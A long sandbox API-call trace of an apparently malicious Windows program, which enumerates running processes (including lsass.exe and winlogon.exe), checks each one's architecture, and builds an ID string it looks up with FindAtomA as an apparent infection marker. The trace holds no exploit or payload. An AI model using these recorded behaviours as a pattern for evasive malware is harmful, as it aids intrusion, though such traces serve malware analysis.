	[0084.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39563c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x558
	[0084.136] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.136] CloseHandle (hObject=0x558) returned 1
	[0084.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956230, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x558
	[0084.136] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.136] CloseHandle (hObject=0x558) returned 1
	[0084.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x398cca8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39561a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x558
	[0084.137] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.137] CloseHandle (hObject=0x558) returned 1
	[0084.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x398caa8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x558
	[0084.137] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.137] CloseHandle (hObject=0x558) returned 1
	[0084.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x397aa20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x558
	[0084.137] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.137] CloseHandle (hObject=0x558) returned 1
	[0084.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x398cba8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x558
	[0084.137] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.137] CloseHandle (hObject=0x558) returned 1
	[0084.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x3985df0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x558
	[0084.138] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.138] CloseHandle (hObject=0x558) returned 1
	[0084.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x398cca8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x558
	[0084.138] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.138] CloseHandle (hObject=0x558) returned 1
	[0084.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x3956368, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x558
	[0084.138] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.138] CloseHandle (hObject=0x558) returned 1
	[0084.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x3956368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x558
	[0084.138] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.139] CloseHandle (hObject=0x558) returned 1
	[0084.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x398cca8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x558
	[0084.139] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.139] CloseHandle (hObject=0x558) returned 1
	[0084.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x398caa8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x558
	[0084.139] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.139] CloseHandle (hObject=0x558) returned 1
	[0084.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x3956230, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x558
	[0084.139] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.139] CloseHandle (hObject=0x558) returned 1
	[0084.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x3956368, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x558
	[0084.140] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.140] CloseHandle (hObject=0x558) returned 1
	[0084.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x3985cb0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x558
	[0084.140] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.140] CloseHandle (hObject=0x558) returned 1
	[0084.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x3956368, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x558
	[0084.140] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.140] CloseHandle (hObject=0x558) returned 1
	[0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39561d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x558
	[0084.141] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.141] CloseHandle (hObject=0x558) returned 1
	[0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x398ca08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x558
	[0084.141] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.141] CloseHandle (hObject=0x558) returned 1
	[0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x3956308, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x558
	[0084.141] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.141] CloseHandle (hObject=0x558) returned 1
	[0084.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x398ca08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x558
	[0084.142] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.142] CloseHandle (hObject=0x558) returned 1
	[0084.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x3985f08, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x558
	[0084.142] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.142] CloseHandle (hObject=0x558) returned 1
	[0084.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x3985e90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x558
	[0084.142] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.142] CloseHandle (hObject=0x558) returned 1
	[0084.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x3956248, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x558
	[0084.142] GetLastError () returned 0x5
	[0084.142] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.143] GetLastError () returned 0x5
	[0084.144] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.144] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.144] GetProcessTimes (in: hProcess=0x558, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.144] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.145] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetLastError () returned 0x5
	[0084.146] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.146] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.146] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.147] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.147] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.147] CloseHandle (hObject=0x558) returned 1
	[0084.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x3956230, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39562c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x558
	[0084.147] IsWow64Process (in: hProcess=0x558, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.147] CloseHandle (hObject=0x558) returned 1
	[0084.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x3956248, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x3956368, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16de0) returned 0xc0000004
	[0084.186] VirtualAlloc (lpAddress=0x0, dwSize=0x16ee0, flAllocationType=0x3000, flProtect=0x4) returned 0x39f0000
	[0084.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39f0000, Length=0x16ee0, ResultLength=0x0 | out: SystemInformation=0x39f0000, ResultLength=0x0) returned 0x0
	[0084.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e848, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e848, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e800, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e698, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e800, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e800, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e848, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x803010, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
